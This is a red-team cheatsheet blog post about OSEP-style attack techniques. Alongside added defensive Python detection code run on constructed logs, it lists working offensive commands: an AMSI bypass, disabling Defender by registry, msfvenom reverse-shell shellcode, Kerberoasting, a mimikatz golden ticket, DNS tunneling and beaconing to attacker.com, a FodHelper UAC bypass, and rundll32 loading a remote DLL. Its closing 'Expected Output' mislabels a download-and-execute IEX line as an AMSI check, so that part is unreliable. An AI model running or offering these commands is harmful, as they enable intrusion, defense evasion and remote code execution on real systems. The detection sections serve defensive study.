From OSCP to OSEP: The Ultimate Red Teaming Cheatsheet


If OSCP taught us how to break in, OSEP teaches us how to stay in—undetected. This isn’t just another pentesting cert—it’s a full-blown adversarial training designed to teach advanced offensive security techniques.

🔗 Learn More: OSEP Certification Details
📝 Further Insights: Medium on OSEP

You Should Know:

1. EDR & AMSI Bypass – Outsmart Modern Defenses

  • AMSI Bypass with PowerShell:
    [bash].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

  • Disabling Windows Defender via Registry policy (mock example; this is a Defender policy value, not a generic EDR switch):
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

2. Custom Shellcoding – Build Undetectable Payloads

  • Generating shellcode with msfvenom (as written, this emits raw, unencoded shellcode; XOR encoding would be a separate step):
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw -o payload.bin
    
  • Using `scdbg` for Shellcode Analysis:
    scdbg /f payload.bin /s 1000000
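From the analyst's side, the usual problem with an XOR-encoded blob is recovering the key so the payload can be read and its imports identified. The script below is an added example, not code from the post or from any tool it mentions: it brute-forces all 256 single-byte keys and looks for library names a Windows payload normally embeds, the same idea behind XORSearch-style tools. The SAMPLE blob, the key 0x5A and the string list are all constructed for the example.

```python
# Single-byte XOR key recovery for a captured encoded blob (analyst-side helper).
# The sample is constructed: a few strings a Windows payload typically carries,
# padded with filler bytes, then XOR-encoded with key 0x5A. It is not real shellcode.

def xor_bytes(data, key):
    """XOR every byte with a single-byte key (the same operation encodes and decodes)."""
    return bytes(b ^ key for b in data)

PLAINTEXT = (b"\x90" * 16
             + b"kernel32.dll\x00LoadLibraryA\x00ws2_32.dll\x00"
             + b"\xcc" * 16)
SAMPLE = xor_bytes(PLAINTEXT, 0x5A)   # constructed stand-in for a captured payload.bin

# Strings worth testing for: API/library names that decoded payloads usually contain.
DEFAULT_NEEDLES = (b"kernel32", b"ws2_32", b"LoadLibrary", b"GetProcAddress")

def xor_search(blob, needle):
    """Try all 256 single-byte keys; return (key, offset) pairs where `needle` appears."""
    hits = []
    for key in range(256):
        off = xor_bytes(blob, key).find(needle)
        if off != -1:
            hits.append((key, off))
    return hits

def guess_key(blob, needles=DEFAULT_NEEDLES):
    """Return the key under which the most needles decode, or None if nothing matches."""
    votes = {}
    for needle in needles:
        for key, _ in xor_search(blob, needle):
            votes[key] = votes.get(key, 0) + 1
    if not votes:
        return None
    return max(votes, key=votes.get)

def recover_strings(blob, key, min_len=6):
    """Decode with `key` and pull out printable ASCII runs, like `strings` on the decoded blob."""
    out, cur = [], bytearray()
    for b in xor_bytes(blob, key):
        if 32 <= b < 127:
            cur.append(b)
            continue
        if len(cur) >= min_len:
            out.append(cur.decode("ascii"))
        cur = bytearray()
    if len(cur) >= min_len:
        out.append(cur.decode("ascii"))
    return out

if __name__ == "__main__":
    key = guess_key(SAMPLE)
    print("likely key: %#04x" % key if key is not None else "no key found")
    if key is not None:
        for s in recover_strings(SAMPLE, key):
            print("  ", s)
```

One caveat worth remembering: a single-byte XOR is a bijection on byte values, so it leaves the byte histogram and therefore the Shannon entropy of the blob unchanged. Entropy heuristics alone will not separate a XOR-encoded payload from the plain one; a known-string search under every key, as above, will.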
    

3. AD Exploitation – Move Laterally, Escalate, Dominate

  • Kerberoasting with Impacket:
    python GetUserSPNs.py -request -dc-ip 10.10.10.1 domain/user:password
    
  • Golden Ticket Attack:
    mimikatz kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt
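Both techniques above leave traces in domain controller security logs: Kerberoasting shows up as a burst of service ticket requests (event 4769) with RC4 encryption (type 0x17) for several SPN-backed accounts from one principal, and a forged TGT is used without any preceding TGT request (event 4768) from the same account. The detection code below is an added example, not from the post or from Impacket or mimikatz; the event records are constructed, simplified versions of 4768/4769 fields, and the thresholds and rule names are my own choices.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified Windows Security events (4768 = TGT requested, 4769 = service
# ticket requested). Field names mirror the event XML loosely; this is not a real log.
EVENTS = [
    {"id": 4768, "time": "2024-05-01T09:00:00", "user": "jdoe", "ip": "10.10.10.50", "service": "krbtgt", "etype": "0x12"},
    {"id": 4769, "time": "2024-05-01T09:00:05", "user": "jdoe", "ip": "10.10.10.50", "service": "cifs/fs01", "etype": "0x12"},
    {"id": 4768, "time": "2024-05-01T09:05:00", "user": "pentest", "ip": "10.10.10.99", "service": "krbtgt", "etype": "0x12"},
    {"id": 4769, "time": "2024-05-01T09:05:01", "user": "pentest", "ip": "10.10.10.99", "service": "svc_sql", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:05:01", "user": "pentest", "ip": "10.10.10.99", "service": "svc_web", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:05:02", "user": "pentest", "ip": "10.10.10.99", "service": "svc_backup", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:05:02", "user": "pentest", "ip": "10.10.10.99", "service": "svc_exch", "etype": "0x17"},
    {"id": 4769, "time": "2024-05-01T09:30:00", "user": "Administrator", "ip": "10.10.10.77", "service": "cifs/dc01", "etype": "0x12"},
]

def kerberoast_candidates(events, min_services=3, window=timedelta(minutes=5)):
    """Flag (user, ip) pairs that requested RC4 (0x17) service tickets for
    `min_services` or more distinct services inside one time window."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["id"] == 4769 and ev["etype"] == "0x17" and not ev["service"].lower().startswith("krbtgt"):
            by_user[(ev["user"], ev["ip"])].append((datetime.fromisoformat(ev["time"]), ev["service"]))
    flagged = {}
    for key, reqs in by_user.items():
        reqs.sort()
        # Slide the window over the sorted requests; stop at the first window that trips the threshold.
        for i, (t0, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(services) >= min_services:
                flagged[key] = sorted(services)
                break
    return flagged

def tgs_without_tgt(events, lookback=timedelta(hours=10)):
    """Flag 4769 service ticket requests for which no 4768 TGT request from the same
    account was seen within the TGT lifetime (10 hours by default). A forged TGT is
    presented straight to the TGS, so the AS exchange never happens."""
    tgts = defaultdict(list)
    for ev in events:
        if ev["id"] == 4768:
            tgts[ev["user"].lower()].append(datetime.fromisoformat(ev["time"]))
    suspicious = []
    for ev in events:
        if ev["id"] != 4769:
            continue
        t = datetime.fromisoformat(ev["time"])
        seen_tgt = any(0 <= (t - tgt).total_seconds() <= lookback.total_seconds()
                       for tgt in tgts[ev["user"].lower()])
        if not seen_tgt:
            suspicious.append((ev["user"], ev["ip"], ev["service"]))
    return suspicious

if __name__ == "__main__":
    print("kerberoasting:", kerberoast_candidates(EVENTS))
    print("TGS without TGT:", tgs_without_tgt(EVENTS))
```

Two practical notes: the second rule only works when 4768 and 4769 events from every domain controller are collected in one place, since a client can get its TGT from one DC and its service tickets from another; and RC4 service ticket requests do occur legitimately for accounts that still have RC4 enabled, so the Kerberoasting rule is about volume and breadth from one principal, not any single request.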
    

4. Covert C2 – Stay Stealthy, Stay Persistent

  • DNS Tunneling with dnscat2:
    sudo ruby dnscat2.rb --dns domain=attacker.com --secret=mysecret
    
  • HTTPS Beaconing with Cobalt Strike:
    Start-Process -NoNewWindow -FilePath "C:\beacon.exe" -ArgumentList "-https https://attacker.com -sleep 5000"
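Both covert channels above have a network-side signature: DNS tunneling produces a stream of long, high-entropy, never-repeating subdomains under one registered domain, and a fixed-sleep HTTPS beacon produces outbound connections at near-constant intervals (the `-sleep 5000` above would be five seconds). The following detection code is an added example, written here for the defender's side; it is not from the post, dnscat2 or Cobalt Strike. Both log excerpts are constructed, the IP addresses are documentation ranges, and the thresholds are my own starting points.

```python
import math
from collections import Counter, defaultdict
from datetime import datetime

# Constructed DNS query log: "<timestamp> <client> <qname> <qtype>" (not real traffic).
DNS_LOG = """\
2024-05-01T10:00:00 10.0.0.5 www.example.com A
2024-05-01T10:00:01 10.0.0.5 mail.example.com A
2024-05-01T10:00:02 10.0.0.9 4f9a2b7c1e3d5a8b9c0d1e2f3a4b5c6d.attacker.com TXT
2024-05-01T10:00:03 10.0.0.9 7e1c9d3b5a2f8e4c6b0d9a1f3e5c7b2d.attacker.com TXT
2024-05-01T10:00:04 10.0.0.9 a3c5e7b9d1f2a4c6e8b0d2f4a6c8e0b1.attacker.com TXT
2024-05-01T10:00:05 10.0.0.9 b8d0f2a4c6e8b0d2f4a6c8e0b1d3f5a7.attacker.com TXT
2024-05-01T10:00:06 10.0.0.5 cdn.example.com A
"""

# Constructed outbound connection log: "<timestamp> <src> <dst> <dport>" (not real traffic).
CONN_LOG = """\
2024-05-01T10:00:00 10.0.0.9 203.0.113.10 443
2024-05-01T10:00:05 10.0.0.9 203.0.113.10 443
2024-05-01T10:00:10 10.0.0.9 203.0.113.10 443
2024-05-01T10:00:15 10.0.0.9 203.0.113.10 443
2024-05-01T10:00:20 10.0.0.9 203.0.113.10 443
2024-05-01T10:00:03 10.0.0.5 198.51.100.7 443
2024-05-01T10:00:41 10.0.0.5 198.51.100.7 443
2024-05-01T10:00:44 10.0.0.5 198.51.100.7 443
2024-05-01T10:02:10 10.0.0.5 198.51.100.7 443
2024-05-01T10:03:30 10.0.0.5 198.51.100.7 443
"""

def shannon_entropy(s):
    """Bits of entropy per character of `s` (0.0 for empty input)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def registered_domain(qname):
    """Crude eTLD+1 (last two labels). Enough for the sample; real tooling uses the public suffix list."""
    return ".".join(qname.rstrip(".").split(".")[-2:])

def dns_tunnel_candidates(log, min_queries=3, min_entropy=3.0, min_label_len=20):
    """Flag registered domains whose subdomains look like encoded data:
    long, high-entropy, and unique on (almost) every query."""
    stats = defaultdict(lambda: {"queries": 0, "subs": set(), "entropy": 0.0, "data_qtypes": 0})
    for line in log.splitlines():
        _ts, _client, qname, qtype = line.split()
        dom = registered_domain(qname)
        sub = qname[: -len(dom) - 1] if len(qname) > len(dom) else ""
        st = stats[dom]
        st["queries"] += 1
        if sub and sub not in st["subs"]:
            st["subs"].add(sub)
            st["entropy"] += shannon_entropy(sub.replace(".", ""))
        if qtype in ("TXT", "NULL", "CNAME", "MX"):   # record types tunnels use to carry downstream data
            st["data_qtypes"] += 1
    flagged = {}
    for dom, st in stats.items():
        if st["queries"] < min_queries or not st["subs"]:
            continue
        avg_entropy = st["entropy"] / len(st["subs"])
        longest = max(len(s) for s in st["subs"])
        unique_ratio = len(st["subs"]) / st["queries"]
        if avg_entropy >= min_entropy and longest >= min_label_len and unique_ratio >= 0.9:
            flagged[dom] = {"queries": st["queries"], "avg_entropy": round(avg_entropy, 2),
                            "longest_label": longest, "data_qtypes": st["data_qtypes"]}
    return flagged

def beacon_candidates(log, min_connections=5, max_cv=0.2):
    """Flag (src, dst, port) triples whose inter-connection gaps are nearly constant.
    The coefficient of variation (stddev / mean) is low for a fixed-sleep beacon."""
    series = defaultdict(list)
    for line in log.splitlines():
        ts, src, dst, port = line.split()
        series[(src, dst, port)].append(datetime.fromisoformat(ts))
    flagged = {}
    for key, times in series.items():
        if len(times) < min_connections:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        mean = sum(gaps) / len(gaps)
        if mean == 0:
            continue
        cv = math.sqrt(sum((g - mean) ** 2 for g in gaps) / len(gaps)) / mean
        if cv <= max_cv:
            flagged[key] = {"interval_s": mean, "cv": round(cv, 3), "connections": len(times)}
    return flagged

if __name__ == "__main__":
    print("DNS tunnel candidates:", dns_tunnel_candidates(DNS_LOG))
    print("beacon candidates:", beacon_candidates(CONN_LOG))
```

The beacon rule is deliberately strict (`max_cv=0.2`): real C2 frameworks add jitter to the sleep, which raises the coefficient of variation, so in practice the threshold is tuned against the jitter range you expect and paired with volume and destination reputation rather than used alone. CDN-backed domains can also produce many unique subdomains, which is why the DNS rule requires entropy and label length together, not just uniqueness.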
    
5. Windows Exploitation – Master UAC, Tokens & LOLBAS

  • Bypassing UAC via FodHelper:
    reg add "HKCU\Software\Classes\ms-settings\Shell\Open\command" /d "C:\reverse_shell.exe" /f

  • Abusing `Rundll32` for Execution:
    rundll32.exe \attacker.com\share\malicious.dll,EntryPoint
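The host-side techniques in sections 1 and 5 all touch telemetry that Sysmon or an EDR already collects: registry value writes (the Defender policy key and the `ms-settings\Shell\Open\command` key under HKCU), process creation (rundll32 loading a DLL from a UNC path or URL), and PowerShell script block logging (event 4104, which records script text containing the AmsiUtils/amsiInitFailed references). The rule set below is an added example, not from the post; the telemetry records are constructed in a simplified Sysmon-like shape, and the rule names, field names and user names are my own.

```python
import re
from collections import Counter

# Constructed host telemetry in a simplified Sysmon-like shape (registry value set,
# process creation, PowerShell script block). These are not real events.
TELEMETRY = [
    {"type": "registry_set", "user": "LAB\\alice",
     "key": r"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender", "value": "DisableAntiSpyware", "data": "1"},
    {"type": "registry_set", "user": "LAB\\alice",
     "key": r"HKCU\Software\Classes\ms-settings\Shell\Open\command", "value": "(Default)", "data": r"C:\Users\alice\x.exe"},
    {"type": "registry_set", "user": "LAB\\bob",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "value": "OneDrive", "data": r"C:\Program Files\OneDrive\OneDrive.exe"},
    {"type": "process_create", "user": "LAB\\alice",
     "image": r"C:\Windows\System32\rundll32.exe", "command_line": r"rundll32.exe \\203.0.113.10\share\m.dll,EntryPoint"},
    {"type": "process_create", "user": "LAB\\bob",
     "image": r"C:\Windows\System32\rundll32.exe", "command_line": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"type": "script_block", "user": "LAB\\alice",
     "text": "...GetType('System.Management.Automation.AmsiUtils')...GetField('amsiInitFailed'..."},
]

DEFENDER_POLICY_KEY = r"policies\microsoft\windows defender"
FODHELPER_KEY = r"software\classes\ms-settings\shell\open\command"
# Two backslashes followed by a host name, or an http(s) URL, anywhere in the command line.
REMOTE_PATH = re.compile(r"(\\\\[^\s\\]+\\|https?://)", re.IGNORECASE)

def is_defender_policy_tamper(ev):
    """Defender disabled through the policy key (section 1, second command)."""
    return (ev["type"] == "registry_set"
            and ev["key"].lower().endswith(DEFENDER_POLICY_KEY)
            and ev["value"].lower() == "disableantispyware"
            and ev["data"].strip() == "1")

def is_fodhelper_uac_key(ev):
    """Per-user ms-settings handler written under HKCU (section 5, first command)."""
    k = ev.get("key", "").lower()
    return ev["type"] == "registry_set" and k.startswith("hkcu\\") and FODHELPER_KEY in k

def is_rundll32_remote_dll(ev):
    """rundll32 pointed at a DLL on a UNC share or URL (section 5, second command)."""
    return (ev["type"] == "process_create"
            and ev["image"].lower().endswith("\\rundll32.exe")
            and bool(REMOTE_PATH.search(ev["command_line"])))

def is_amsi_tamper(ev):
    """Script block text that references the AMSI internals (section 1, first command)."""
    t = ev.get("text", "").lower()
    return ev["type"] == "script_block" and ("amsiutils" in t or "amsiinitfailed" in t)

RULES = [
    ("defender_policy_tamper", is_defender_policy_tamper),
    ("fodhelper_uac_bypass_key", is_fodhelper_uac_key),
    ("rundll32_remote_dll", is_rundll32_remote_dll),
    ("amsi_tamper", is_amsi_tamper),
]

def detect(events):
    """Return (rule_name, user) for every event that trips a rule, in log order."""
    hits = []
    for ev in events:
        for name, rule in RULES:
            if rule(ev):
                hits.append((name, ev["user"]))
    return hits

def hits_per_user(hits):
    """Several different rules firing for one user in a short span is the useful signal."""
    return dict(Counter(user for _, user in hits))

if __name__ == "__main__":
    for name, user in detect(TELEMETRY):
        print(f"{name:28s} {user}")
    print(hits_per_user(detect(TELEMETRY)))
```

Each rule on its own is noisy in places (administrators do edit Defender policy, and rundll32 with a local DLL is routine, which is why the rule insists on a remote path). What makes the set useful is correlation: `hits_per_user` shows all four firing for one account, which is the pattern to alert on.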

What Undercode Says

OSEP is the evolution of red teaming—where persistence, evasion, and deep system manipulation become second nature. Unlike OSCP, which focuses on initial access, OSEP dives into maintaining stealth in hostile environments. Key takeaways:
– EDR/AMSI bypasses are critical for modern engagements.
– Living-off-the-land (LOLBAS) reduces detection risks.
– Custom C2 frameworks outperform off-the-shelf tools in targeted attacks.

Expected Output:

  • Example: Checking for AMSI in PowerShell:
    $ExecutionContext.SessionState.LanguageMode
    (New-Object Net.WebClient).DownloadString("http://attacker.com/amsibypass.ps1") | IEX

Reported By: Alexrweyemamu From – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅